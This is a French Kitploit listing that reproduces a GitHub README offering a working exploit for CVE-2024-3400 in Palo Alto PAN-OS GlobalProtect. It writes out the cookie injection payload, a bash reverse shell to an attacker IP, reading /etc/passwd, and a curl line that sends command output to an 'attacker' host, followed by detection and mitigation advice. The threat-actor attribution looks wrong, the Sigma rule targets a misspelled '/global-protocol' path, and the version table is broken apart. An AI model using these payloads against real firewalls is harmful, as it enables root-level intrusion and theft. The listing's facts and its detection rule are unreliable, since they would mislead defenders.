Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2024-3400-panos_rce_reproduction — Reproduction de cve-2024-3400-panos_rce_reproduction | Kitploit
Outils/GitHubGitHub/razureink/cve-2024-3400-panos_rce_reproduction
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed TeamingLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
razureink/cve-2024-3400-panos_rce_reproduction

cve-2024-3400-panos_rce_reproduction

Reproduction de cve-2024-3400-panos_rce_reproduction

Voir le dépôt
il y a 27 joursPas encore vérifié

CVE-2024-3400 : Injection de commandes RCE dans Palo Alto PAN-OS GlobalProtect

CVSS 10.0 CRITIQUE | CWE-78 : injection de commandes système | massivement exploitée dans la nature


Vue d’ensemble

CVE-2024-3400 est une vulnérabilité d’injection de commandes avant authentification dans les interfaces de portail et de passerelle GlobalProtect de Palo Alto Networks PAN-OS. Cette vulnérabilité permet à un attaquant non authentifié d’exécuter des commandes arbitraires avec les privilèges root sur le pare-feu concerné.

  • Découverte par : Volexity (avril 2024)
  • Acteur de la menace attribué : UNC4554 / Midnight Blizzard (parrainé par l’État russe)
  • ID CVE : CVE-2024-3400
  • Score CVSS : 10.0 (Critique)
  • CWE : CWE-78 (neutralisation incorrecte des éléments spéciaux utilisés dans une commande système)
  • Impact : compromission totale des pare-feu PAN-OS, mouvement latéral, déploiement de ransomwares
  • Statut : activement exploitée en tant que 0-day avant la divulgation publique

Détails techniques

Cause racine

La vulnérabilité réside dans la gestion des cookies de session du composant de portail et de passerelle GlobalProtect. La fonction chargée de traiter le cookie SESSID ne parvient pas à assainir correctement les entrées fournies par l’utilisateur avant de les transmettre à une commande shell.

Plus précisément, une requête HTTP non authentifiée vers le point de terminaison du portail GlobalProtect (/global-protect/login.esp) avec un cookie SESSID spécialement conçu contenant des métacaractères shell (backticks et expansion de variables) aboutit à une injection de commandes.

Mécanisme d’injection

Le chemin de code vulnérable fonctionne comme suit :

  1. Le portail GlobalProtect reçoit une requête vers /global-protect/login.esp
  2. La valeur du cookie SESSID est extraite sans assainissement
  3. Cette valeur est interpolée dans une chaîne de commande shell
  4. La commande est exécutée via system() ou une fonction similaire d’exécution de commandes système
  5. Étant donné que l’application s’exécute en tant que root, la commande injectée est exécutée avec tous les privilèges système

Construction de la charge utile

La charge utile d’injection utilise des commandes délimitées par des backticks dans le cookie SESSID :

root@kitploit:~
SESSID=/../../../opt/panlogs/tmp/device_telemetry/`COMMAND`.py

Le chemin traversant (/../../../) sort du répertoire prévu, et la partie COMMAND entre backticks amène le shell à exécuter l’entrée de l’attaquant. La redirection de sortie ou des mécanismes de shell inversé peuvent être utilisés pour exfiltrer les résultats des commandes.


Versions concernées

Version PAN-OSAffectéeCorrigée dans
10.2.x< 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h110.2.4-h16 / 10.2.5-h6 / 10.2.6-h3 / 10.2.7-h8 / 10.2.8-h3 / 10.2.9-h1
11.0.x

Remarque : PAN-OS 9.x et les versions antérieures ne sont pas concernées. Cloud NGFW et Prisma Access ne sont pas concernés.


Exploitation

Vecteur d’attaque

  • Réseau : À distance
  • Authentification : Aucune requise
  • Privilège requis : Aucun
  • Interaction utilisateur : Aucune
  • Impact : Compromission totale de la confidentialité, de l’intégrité et de la disponibilité

Activité observée de l’acteur de la menace

UNC4554 / Midnight Blizzard (APT29) a été observé en train d’exploiter CVE-2024-3400 en tant que 0-day à partir de mars 2024. Volexity a publié son analyse le 12 avril 2024. Les schémas d’attaque observés incluaient :

  1. Accès initial : scan massif des portails GlobalProtect exposés
  2. Exécution de commandes : déploiement de backdoors Python personnalisées via le vecteur d’injection par cookie
  3. Persistance : installation de la backdoor UPSTYLE, vol d’identifiants, extraction de configurations
  4. Mouvement latéral : utilisation des pare-feu compromis comme points d’appui dans les réseaux internes
  5. Exfiltration de données : vol de fichiers de configuration, d’identifiants VPN et de jetons de session
  6. Ransomware : multiples incidents de déploiement de ransomwares après la compromission initiale

Disponibilité de preuves de concept

Plusieurs PoCs publics ont été publiés. Ce dépôt fournit un exploit fonctionnel pour des tests autorisés.


Étapes de reproduction

Prérequis

  • Python 3.8+
  • bibliothèque requests
  • Cible : Palo Alto PAN-OS avec un portail GlobalProtect vulnérable exposé
  • Accès autorisé uniquement

Installation

root@kitploit:~
pip install requests

Exploit de base

root@kitploit:~
python exploit.py --target https://vulnerable-firewall.example.com --command "id"

Exemple de shell inversé

root@kitploit:~
# Start listener on attacker machine
nc -lvnp 4444

# Execute reverse shell
python exploit.py --target https://vuln-panos.example.com \
  --command "bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"

Lecture de fichier arbitraire

root@kitploit:~
python exploit.py --target https://vuln-panos.example.com --command "cat /etc/passwd"

Preuve de concept (curl)

root@kitploit:~
# Basic command execution test
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`id\`.py" \
  'https://target/global-protect/login.esp'

# Command output capture via DNS exfiltration
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`wget -O- http://attacker/$(id|base64)\`.py" \
  'https://target/global-protect/login.esp'

Script PoC

Voir exploit.py dans ce dépôt pour un exploit Python complet prenant en charge :

  • Exécution de commandes arbitraires
  • Prise en charge facultative d’un proxy (Burp Suite / mitmproxy)
  • Contrôle de la vérification SSL
  • Gestion des délais d’attente et des réessais
  • Analyse des réponses

Détection

IOC

  • Requêtes vers /global-protect/login.esp avec des cookies SESSID anormalement longs ou suspects
  • Cookies contenant des séquences de traversée de chemin (/../../) combinées à des caractères backtick
  • Processus inattendus lancés par le composant GlobalProtect
  • Connexions sortantes du pare-feu vers des adresses IP inconnues sur des ports inhabituels
  • Fichiers écrits dans /opt/panlogs/tmp/device_telemetry/ avec des extensions .py

Règle Sigma (simplifiée)

root@kitploit:~
title: CVE-2024-3400 PAN-OS GlobalProtect Command Injection
status: stable
logsource:
  category: webserver
detection:
  selection:
    cs-uri-query: "/global-protocol/login.esp"
    cs-cookie|contains:
      - "../"
      - "`"
  condition: selection

Atténuation

Actions immédiates

  1. Mettez à jour PAN-OS vers les versions corrigées listées ci-dessus
  2. Si un correctif immédiat n’est pas possible, appliquez l’une des solutions de contournement suivantes :
    • Désactivation de la télémétrie de l’appareil : set deviceconfig system telemetry disable yes (bloque le chemin de code vulnérable sans nécessiter de redémarrage)
    • Contrôle d’accès au portail/passerelle GlobalProtect : Restreignez l’accès aux adresses IP sources de confiance
  3. Recherche de compromission : Vérifiez la présence de fichiers non autorisés dans /opt/panlogs/tmp/device_telemetry/
  4. Examen des journaux : Auditez les journaux de connexion GlobalProtect pour détecter des valeurs de cookie SESSID anormales

Correctif permanent

Appliquez le correctif fourni par Palo Alto Networks. Ce correctif assainit correctement l’entrée du cookie avant la construction de la commande shell.

Évaluation de compromission

Si vous soupçonnez une exploitation :

  1. Collectez des images forensiques des pare-feu concernés
  2. Auditez toutes les modifications de configuration (horodatages de dernière modification)
  3. Examinez les processus en cours et les tâches cron
  4. Vérifiez la présence de clés SSH et de comptes utilisateur non autorisés
  5. Renouvelez tous les identifiants VPN et secrets partagés
  6. Inspectez le trafic réseau pour détecter des schémas de communication C2

Références


Avertissement

Ce dépôt est fourni uniquement pour des tests de sécurité autorisés et à des fins éducatives. L’exploitation non autorisée de cette vulnérabilité est illégale. Les auteurs ne sont pas responsables d’un usage abusif de ces informations. Assurez-vous toujours d’avoir une autorisation écrite explicite avant de tester un système.


Licence

Licence MIT – Ce contenu est fourni pour la recherche en sécurité défensive et les tests autorisés.

Télécharger l’outil
< 11.0.1-h10, < 11.0.2-h4, < 11.0.3-h10
11.0.1-h10 / 11.0.2-h4 / 11.0.3-h10
11.1.x< 11.1.1-h311.1.1-h3
SourceLien
Avis de sécurité Palo Altohttps://security.paloaltonetworks.com/CVE-2024-3400
Analyse Volexityhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-command-injection-vulnerability-in-palo-alto-networks-pan-os/
Entrée NVDhttps://nvd.nist.gov/vuln/detail/CVE-2024-3400
Détails CWE-78https://cwe.mitre.org/data/definitions/78.html
CISA KEVhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog
Technique ATT&CKhttps://attack.mitre.org/techniques/T1190/